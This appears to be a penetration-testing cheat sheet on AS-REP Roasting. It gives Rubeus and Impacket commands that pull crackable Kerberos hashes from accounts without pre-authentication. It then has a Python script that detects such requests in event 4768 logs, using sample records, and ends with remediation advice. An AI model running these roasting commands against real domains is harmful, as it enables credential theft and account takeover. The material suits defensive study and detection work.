AS-REP Roasting

If a user does not require Kerberos pre-authentication, an attacker can request an AS-REP for the user and crack the retrieved hash offline.

AS-REP Roasting with Rubeus

# AS-REP Roast all users (burn your opsec):
.\Rubeus.exe asreproast /nowrap

# AS-REP Roast a specific user:
.\Rubeus.exe asreproast /user:$serviceaccount /nowrap

AS-REP Roasting with Impacket

# AS-REP Roast with Impacket
python3 GetNPUsers.py $domain -dc-ip $dcip -usersfile $userfile
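
Detecting AS-REP Roasting

Both tools above leave the same trace on the domain controller when Kerberos Authentication Service auditing is enabled: a successful event 4768 with PreAuthType 0. The Python below is an added detection example, not part of the original page or of either tool; the sample records, the function name and the threshold of 3 accounts are assumptions made for illustration.

```python
# Added example (not from the original page): find TGTs issued without
# pre-authentication in event 4768 records and spot bulk requests from one host.
from collections import defaultdict

# Constructed sample records (not real logs); keys follow event 4768 EventData names.
SAMPLE_EVENTS = [
    {"EventID": 4768, "TargetUserName": "svc_backup", "Status": "0x0",
     "PreAuthType": "0", "TicketEncryptionType": "0x17", "IpAddress": "::ffff:10.0.5.23"},
    {"EventID": 4768, "TargetUserName": "jdoe_legacy", "Status": "0x0",
     "PreAuthType": "0", "TicketEncryptionType": "0x17", "IpAddress": "::ffff:10.0.5.23"},
    {"EventID": 4768, "TargetUserName": "printsvc", "Status": "0x0",
     "PreAuthType": "0", "TicketEncryptionType": "0x17", "IpAddress": "::ffff:10.0.5.23"},
    {"EventID": 4768, "TargetUserName": "alice", "Status": "0x0",
     "PreAuthType": "2", "TicketEncryptionType": "0x12", "IpAddress": "::ffff:10.0.8.40"},
    {"EventID": 4768, "TargetUserName": "svc_legacy_app", "Status": "0x0",
     "PreAuthType": "0", "TicketEncryptionType": "0x12", "IpAddress": "::ffff:10.0.9.11"},
    {"EventID": 4768, "TargetUserName": "nosuchuser", "Status": "0x6",
     "PreAuthType": "-", "TicketEncryptionType": "0xffffffff", "IpAddress": "::ffff:10.0.5.23"},
]

RC4_HMAC = 0x17  # etype 23, the cheapest AS-REP encryption type to crack offline


def find_preauthless_tgts(events, bulk_threshold=3):
    """Return (findings, bulk_sources) for TGTs issued without pre-authentication."""
    findings, by_source = [], defaultdict(set)
    for ev in events:
        if ev.get("EventID") != 4768:
            continue
        if int(ev["Status"], 16) != 0:   # failed request: no ticket was issued
            continue
        if ev["PreAuthType"] != "0":     # 0 = issued without pre-authentication
            continue
        src = ev["IpAddress"]
        if src.startswith("::ffff:"):    # strip the IPv4-mapped IPv6 prefix
            src = src[len("::ffff:"):]
        findings.append({"account": ev["TargetUserName"], "source": src,
                         "rc4": int(ev["TicketEncryptionType"], 16) == RC4_HMAC})
        by_source[src].add(ev["TargetUserName"])
    # One host collecting pre-auth-less tickets for many accounts is the noisy case.
    bulk = {s: sorted(a) for s, a in by_source.items() if len(a) >= bulk_threshold}
    return findings, bulk


if __name__ == "__main__":
    findings, bulk = find_preauthless_tgts(SAMPLE_EVENTS)
    for f in findings:
        print(f)
    print("bulk sources:", bulk)
```

Every account that appears in the findings has "Do not require Kerberos preauthentication" set; clear the flag unless an application depends on it, and give any account that must keep it a long random password.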
